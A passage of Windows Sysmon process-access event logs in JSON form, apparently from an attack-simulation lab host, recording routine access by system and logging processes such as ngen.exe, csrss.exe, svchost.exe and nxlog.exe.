07:03:14.841","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13B2-5F25-0000-0010795E1100}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:14.841\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13B2-5F25-0000-0010795E1100}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:14.841","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13B2-5F25-0000-0010795E1100}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:14.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13B2-5F25-0000-0010795E1100}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:14.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13B2-5F25-0000-0010795E1100}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:14.998\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13B2-5F25-0000-0010FF611100}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:14.998","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13B2-5F25-0000-0010FF611100}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:14.998\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13B2-5F25-0000-0010FF611100}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:14.998","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13B2-5F25-0000-0010FF611100}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:14.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13B2-5F25-0000-0010FF611100}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:14.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13B2-5F25-0000-0010FF611100}","TargetProcessId":"2980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:15.810\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:15.810","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:16.826\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:16.826","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:17.826\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: 